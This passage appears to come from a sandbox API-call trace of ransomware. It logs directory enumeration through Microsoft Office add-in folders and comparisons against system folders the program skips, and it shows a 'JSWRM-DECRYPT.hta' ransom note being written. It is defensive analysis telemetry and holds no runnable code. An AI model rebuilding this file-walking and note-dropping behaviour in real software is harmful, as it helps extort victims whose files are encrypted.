(HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.079] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc70564d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc70564d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc70564d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.080] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.080] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.080] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0df27d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0df27d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x85040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.080] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.081] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0123.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0123.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.081] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0df27d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0df27d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x85040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.081] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.081] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="eu", cAlternateFileName="")) returned 1 [0123.081] lstrcmpiW (lpString1="eu", lpString2=".") returned 1 [0123.081] lstrcmpiW (lpString1="eu", lpString2="..") returned 1 [0123.081] lstrcmpiW (lpString1="eu", lpString2="...") returned 1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="windows") returned -1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="recovery") returned -1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="perflogs") returned -1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="documents and settings") returned 1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="$RECYCLE.BIN") returned 1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="system volume information") returned -1 [0123.082] lstrcmpiW (lpString1="eu", lpString2="msocache") returned -1 [0123.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.082] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\eu\\jswrm-decrypt.hta")) returned 0xffffffff [0123.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0123.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0123.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\eu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.094] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.094] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.095] CloseHandle (hObject=0x338) returned 1 [0123.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\eu\\jswrm-decrypt.hta")) returned 0x20 [0123.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.096] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\eu\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4008f7c7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0123.096] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.096] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4008f7c7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.096] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.096] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.096] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4008f7c7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4008f7c7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4008f7c7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.097] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41f3e26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.097] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 